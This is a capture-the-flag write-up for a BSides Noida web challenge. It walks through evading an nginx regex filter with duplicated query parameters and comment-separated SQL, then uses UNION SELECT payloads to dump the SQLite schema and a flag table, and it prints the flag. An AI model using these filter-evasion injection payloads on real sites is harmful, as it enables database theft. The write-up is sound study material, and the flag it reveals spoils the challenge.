Just a place to see list of all challs from bsides noida CTF, maybe some flag too xD Note : Bruteforce is not required.
Downloading the source and hosting it in a docker locally, we see that this website takes a parameter chall_id
Looking at the index.php
file, we see that the following sql query is being executed.
But if we try to put an alphabet in the parameter chall_id
, we get an error.
Looking at config/ctf.conf
in the source code, there is some regex that is used to prevent alphabets and white spaces.
To bypass this we can use two parameters so that first one is processed by nginx and second one bypasses it.
GET /?chall_id=1&chall_id=a
And to bypass the white space restriction we can use comments.
So instead of UNION SELECT
, we use UNION/**/SELECT
From opening karma.db
(from source code) in sqlite browser, we see that it has 6 columns.
To list columns and tables, I used the following payload
GET /?chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,sql/**/FROM/**/sqlite_master
Using this payload we get a table named flagsss
and column named flag
Now, we can use the following query to retrieve the flag.
GET /?chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,flag/**/FROM/**/flagsss
So the flag is BSNoida{4_v3ry_w4rm_w31c0m3_2_bs1d35_n01d4}